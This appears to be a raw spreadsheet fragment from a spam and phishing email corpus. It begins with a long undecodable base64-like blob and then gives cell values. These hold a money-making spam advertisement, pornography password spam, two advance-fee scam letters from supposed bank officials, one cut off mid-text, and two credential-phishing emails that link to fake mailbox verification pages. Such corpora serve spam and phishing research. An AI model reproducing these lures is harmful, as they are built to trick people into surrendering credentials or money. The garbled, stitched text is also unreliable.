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</t>
  </si>
  <si>
    <t>http://www.e-dowell.com5 www.e-dowell.com www.szdrx.com</t>
  </si>
  <si>
    <t>4540</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Great Offers &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Thu, 26 Sep 2002 11:00:05 -0500</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 11:00:05 -0500</t>
  </si>
  <si>
    <t>MAKE MONEY GIVING AWAY FREE STUFF!</t>
  </si>
  <si>
    <t>| ![]([URL]http://www.expro.biz[/URL] |\n![]([URL]http://www.expro.biz[/URL]  \n---|---  \n![]([URL]http://www.expro.biz[/URL] |\n![]([URL]http://www.expro.biz[/URL]  \n![]([URL]http://www.expro.biz[/URL] |  |\n![]([URL]http://www.expro.biz[/URL] |  |  |\n\n**Make Money With Your Own Free Stuff Website!  \n**Get Your Own Free Stuff Website. With FREEstores.biz, there is no need to\nlearn any programming skills. Your store is automatically set up for you. Of\ncourse, you are welcome to customize your store using the tools offered in the\nOwner's Back Office. Optional customization includes adding your own logo and\nchanging color schemes. You may also add as many as 5 stores to your account\nat no additional charge!\n\nAccess to hundreds of Free products!  \nFREEstores.biz is always on the lookout for new Free products to add to the\nwarehouse. Every time a new product is located, it is automatically added to\nyour store in the appropriate category. When your customers order products,\nthey are shipped from our warehouse directly to your customers. There is no\ninventory for you to manage - ever!\n\n|  \n---|---  \n|\n\n![]([URL]http://www.expro.biz[/URL]  \n  \n---  \n  \nAct now and receive  \na brand-new 1.2 Ghz  \nGateway Computer  \n  \n![]([URL]http://www.expro.biz[/URL]\n\n|  | ![]([URL]http://www.expro.biz[/URL]  \n  \n|  |\n\n****Monthly Commissions!****  \nYou earn **$3** for every Free item ordered by your customers. In your Back\nOffice, you have access to statistics which will tell you exactly how many\ncustomers you had in your store each day, how many items were purchased, and\nmost importantly, how much commission you earned!  \n  \n---  \n![]([URL]http://www.expro.biz[/URL]  \n  \n![]([URL]http://www.expro.biz[/URL]  \n![]([URL]http://www.expro.biz[/URL]  \n![]([URL]http://www.expro.biz[/URL] |  |\n![]([URL]http://www.expro.biz[/URL] |\n\nTRUE MAKE MONEY WHILE YOU SLEEP BUSINESS!\n\n| ![]([URL]http://www.expro.biz[/URL]  \n---|---|---  \n![]([URL]http://www.expro.biz[/URL]  \n![]([URL]http://www.expro.biz[/URL]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www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://www.expro.biz http://admanmail.com http://admanmail.com</t>
  </si>
  <si>
    <t>4536</t>
  </si>
  <si>
    <t>To: Patricia@netscape.com\nFrom: AnawatyTrucks@netscape.net\nDate: Thu, 26 Sep 2002 01:00:53 -0400</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 01:00:53 -0400</t>
  </si>
  <si>
    <t>AnawatyTrucks@netscape.net</t>
  </si>
  <si>
    <t>Patricia@netscape.com</t>
  </si>
  <si>
    <t>Never pay for the goodz again (8SimUgQ)</t>
  </si>
  <si>
    <t>--Boundary_(ID_57z4OPjIWZtVBINVV279ZQ) Content-type: text/html; charset=ISO-8859-1 Content-transfer-encoding: QUOTED-PRINTABLE GET FREE ACCESS TO X X=  X GUARANTEED     100% F= REE PASSWORDS GET INTO = PAYSITES FOR FREE!Click Here to En&amp;#116er!&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD=  ALIGN=3Dcenter VALIGN=3Dmiddle WIDTH=3D100%&gt;&lt;a href=3D[URL]http://www.fre[/URL] epornsecre%74s.net/bnr/3010098220 ta. 3YMLffs0V1go6Cnd --Boundary_(ID_57z4OPjIWZtVBINVV279ZQ)-- _______________________________________________ Crackmice mailing list Crackmice@crackmice.com [URL]http://crackmice.com[/URL]</t>
  </si>
  <si>
    <t>http://www.fre http://crackmice.com</t>
  </si>
  <si>
    <t>2646</t>
  </si>
  <si>
    <t>To: j_owusugh116@hotmail.com\nFrom: Mr James Owusu &lt;j_owusugh116@hotmail.com&gt;\nDate: Thu, 26 Oct 2006 23:45:28 +0000</t>
  </si>
  <si>
    <t>Thu, 26 Oct 2006 23:45:28 +0000</t>
  </si>
  <si>
    <t>Mr James Owusu &lt;j_owusugh116@hotmail.com&gt;</t>
  </si>
  <si>
    <t>j_owusugh116@hotmail.com</t>
  </si>
  <si>
    <t>URGENT RESPONSE</t>
  </si>
  <si>
    <t>&gt;From The Desk Of,\nMr James Owusu.\n\nDear Friend,\n\nMy name is Mr James Owusu . I am the Regional Manager of Ghana west Africa \nBank  Ghana, accra branch Ghana. I write you this proposal in good faith; I \nam married with two lovely children. I am a man of peace, and have sincere \nrespect for human feelings and opinions. I have packaged a financial \ntransaction that will benefit you and I. As the Regional Manager of Ghana \nwest Africa Bank , accra branch Ghana it is my duty to send in a financial \nreport to my head office in the capital city, Accra at the end of each \nbusiness year.\n\nOn the course of last year, 2005 business report, I discovered that the \nbranch in which I am the Manager made 9.3million United States Dollars \n($9,300,000.00) which my head office is not aware of and will never be aware \nof. I have placed this funds on what we call Escrow call account with no \nbeneficiary. As an officer of this bank I cannot be directly connected to \nthis money, so my aim of contacting you is to assist me receive this money \nin your bank account and get 30% of the total funds as commission.\n\nThere are practically no risks involved, the transaction will be executed \nunder a legitimate\narrangement that will protect you from any breach of the law, it will be \nsimply a bank-to-bank transfer, and all I need from you is to stand claim as \nthe original depositor of these funds who made the deposit with my branch so \nthat my head office can order the transfer to your designated bank account \nunder few working days. If you accept to work with me I will appreciate it \nvery much as you are the first and the only person I am contacting for this \ntransaction.\n\nsend me an email as soon as you receive this message if you think so that we \ncan go over the details.\n\nThank you in advance and may God bless you and your family.\n\nSincerely,\nMr James Owusu.\n\n_________________________________________________________________\nDon't just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>248</t>
  </si>
  <si>
    <t>To: nan\nFrom: EMAIL SUSPENDED &lt;emailalert@gfbonline.ml&gt;\nDate: Thu, 26 May 2016 21:20:47 +0000</t>
  </si>
  <si>
    <t>Thu, 26 May 2016 21:20:47 +0000</t>
  </si>
  <si>
    <t>EMAIL SUSPENDED &lt;emailalert@gfbonline.ml&gt;</t>
  </si>
  <si>
    <t>Your Mailbox Will Be Suspended!</t>
  </si>
  <si>
    <t>Your Mailbox Will Be Suspended!   A termination request was received from your mailbox account, your mailbox will be terminated after 24 hours.  If you did not make this request, click CANCEL REQUEST[1] and reconfirm your ID. Team Security Copyright © 2016 All rights reserved.   ________________________________________________________________ Please do not reply to this message. Mail sent to this address cannot be answered. Links: ------ [1] [URL]http://account-update.newtrendz.org[/URL] Your Mailbox Will Be Suspended! A termination request was received from your mailbox account, your mailbox will be terminated after 24 hours.  If you did not make this request, click CANCEL REQUEST and reconfirm your ID. Team Security Copyright © 2016 All rights reserved. ________________________________________________________________ Please do not reply to this message. Mail sent to this address cannot be answered.</t>
  </si>
  <si>
    <t>http://account-update.newtrendz.org</t>
  </si>
  <si>
    <t>247</t>
  </si>
  <si>
    <t>To: nan\nFrom: NUR AZURA BT ZAKARIA &lt;nurazura.zakaria@arb.com.my&gt;\nDate: Thu, 26 May 2016 19:48:57 +0800</t>
  </si>
  <si>
    <t>Thu, 26 May 2016 19:48:57 +0800</t>
  </si>
  <si>
    <t>NUR AZURA BT ZAKARIA &lt;nurazura.zakaria@arb.com.my&gt;</t>
  </si>
  <si>
    <t>Webmail Administrator</t>
  </si>
  <si>
    <t>\n\nDear Account Owner,\n\nYour mailbox have exceeded 3.5 MB set by the administrator, you will not be able to send or receive mail except you re-verify your account by clicking on this link: [URL]http://40efc5.netai.net[/URL] and complete the required details and click on submit.\n\nThanks\nWebmail Administrator\n\n________________________________\nDisclaimer - Please Read\nThe information in this e-mail and any attachment(s) hereto is only for the sole use of the intended recipient(s) and may be confidential and/or privileged. If you are not the intended recipient or have received this email by error, please be advised that any use of, reliance on, reference to, disclosure of, alteration to, dissemination, forwarding, printing or copying of the information for any purpose is strictly prohibited, unauthorised and may be illegal, and you should permanently delete this email and all copies from your computer system. Any information not related to the official business of Amanah Raya Berhad and its subsidiaries is solely the author's and does not necessarily represent the view of Amanah Raya Berhad and its subsidiaries and is not necessarily endorsed by Amanah Raya Berhad and its subsidiaries. Amanah Raya Berhad and its subsidiaries shall not be liable for any loss or damage caused by viruses or any other defects transmitted by this e-mail or its attachments. Amanah Raya Berhad and its subsidiaries shall not be responsible for any authorised changes made to the information or for the effect of such changes.\n\n</t>
  </si>
  <si>
    <t>http://40efc5.netai.net</t>
  </si>
  <si>
    <t>1327</t>
  </si>
  <si>
    <t>To: nan\nFrom: Qin &lt;qinqinwang1@o2.pl&gt;\nDate: Thu, 26 May 2005 13:05:34 +0200</t>
  </si>
  <si>
    <t>Thu, 26 May 2005 13:05:34 +0200</t>
  </si>
  <si>
    <t>Qin &lt;qinqinwang1@o2.pl&gt;</t>
  </si>
  <si>
    <t>Business project\n&gt;From Qin Wang\nLloyds TSB Pacific Limited \nHong Kong Branch\nFax: +852-301-66259\n                                                                       \nThank you for giving me your time. Please be patient and read my email   to you.\n\nI am a staff of Lloyds TSB Group attached in Private Banking Services. I am contacting you \nconcerning a customer and, an investment placed under our banks management 3 years ago, I \ncontacted you independently of our investigation and no one is informed of this communication \nand I Would like to intimate you with certain facts that I believe would be of interest to you.\n\nIn 2000, the subject matter; ref: bb/tsb/bank/73 came to our bank to engage in business \ndiscussions with our Private Banking Services Department. He informed us that he had a \nfinancial portfolio of 8.35 million United States Dollars, which he wished to have us turn \nover on his behalf. I was the officer assigned to his case; I made numerous suggestions in \nline with my duties as the de-facto chief operations officer of the Private Banking Services \nDepartment, especially given the volume of funds he wished to put into our bank. We met on \nnumerous occasions prior to any investments being placed. I encouraged him to consider various \ngrowth funds with prime ratings. The favored route in my advice to customers is to start by \nassessing data on 600 traditional stocks and bond managers and alternative investments. Based \non my advice, we spun the money around various opportunities and made attractive margins for \nour first months of operation, the accrued profit and interest stood at this point at over 10 \nmillion United States Dollars, this margin was not the full potential of the fund but he \ndesired low risk guaranteed returns on investments. In mid 2001, he asked that the money be \nliquidated because he needed to make an urgent investment requiring cash payments in Europe. \nHe directed that I liquidate the funds and had it deposited with a firm in Europe. I informed \nhim that our bank would have to make special arrangements to have this done and in order not \nto circumvent due process, the bank would have to make a 9.5 % deduction from the funds to \ncater for banking and statutory charges. He complained about the charges but later came around \nwhen I explained to him the complexities of the task he was asking of us. Cash movement across \nborders has become especially strict since the incidents of 9/11. \n\nI contacted my affiliate in Europe and had the funds available in main land Europe. I \nundertook all the processes and made sure I followed his precise instructions to the letter \nand had the funds deposited in a security consultancy firm, the firm is a specialist private \nfirm that accepts deposits from high net worth individuals and blue chip corporations that \nhandle valuable products or undertake transactions that need immediate access to cash. This \nsmall and highly private organization is familiar especially to the highly placed and Well-\nconnected organizations. In line with instructions, the money was deposited. He told me he \nwanted the money there in anticipation of his arrival from Norway later that week. This was \nthe last communication we had, this transpired around 20th  June 2002. In June last year, we \ngot a call from the security firm informing us of the inactivity of that particular portfolio. \nThis was an astounding position as far as I was concerned, given the fact that I managed the \nprivate banking sector I was the only one who knew about the deposit, and I could not \nunderstand why he had not come forward to claim his deposit.\n\n I made futile efforts to locate him I immediately passed the task of locating him to the \ninternal investigations department of our bank. Four days later, information started to \ntrickle in, that he was apparently dead. A person who suited his description was declared dead \nof a heart attack in Cannes, South of France. We were soon enough able to identify the body \nand cause of death was confirmed. The bank immediately launched an investigation into possible \nsurviving next of kin to alert about the situation and also to come forward to claim his \nestate. If you are familiar with private banking affairs, those who patronize our services \nusually prefer anonymity, but also some levels of detachment from conventional processes. In \nhis bio-data form, he listed no next of kin. In the field of private banking, opening an \naccount with us means no one will know of its existence, accounts are rarely held under a name \ndepositors use numbers and codes to make the accounts anonymous. This bank also gives the \nchoice to depositors of having their mail sent to them or held at the bank itself, ensuring \nthat there are no traces of the account and as I said, rarely do they nominate next of kin. \nPrivate banking clients apart from not nominating next of kin also usually in most cases leave \nwills in our care, in this case; he died in testate.\n\nWhat I wish to relate to you will smack of unethical practice but I want you to understand \nsomething. It is only an outsider to the banking world who finds the internal politics of the \nbanking world aberrational. The world of private banking especially is fraught with huge \nrewards for those who occupy certain offices and oversee certain portfolios. You should have \nbegun by now to put together the general direction of what I propose. There is US$ \n8,370,000.00 deposited, I alone have the deposit details and they will release the deposit to \nno one unless I instruct them to do so. I alone know of the existence of this deposit for as \nfar as the finance firm, the transaction with our deceased customer concluded when I sent the \nfunds to the firm, all outstanding interactions in relation to the file are just customer \nservices and due process. The finance firm has no single idea of what's the history or nature \nof the deposit. They are simply awaiting instructions to release the deposit to any party that \ncomes forward. This is the situation. This bank has spent great amounts of money trying to \ntrack this man's family; they have investigated for months and have found no family. The \ninvestigation has come to an end.\n\n My proposal ,  you share similar details to the late fellow  I am prepared to place you in a \nposition to instruct the finance firm to release the deposit to you as the closest surviving \nrelation. Upon receipt of the deposit, I am prepared to share the money with you in half and \nno more. 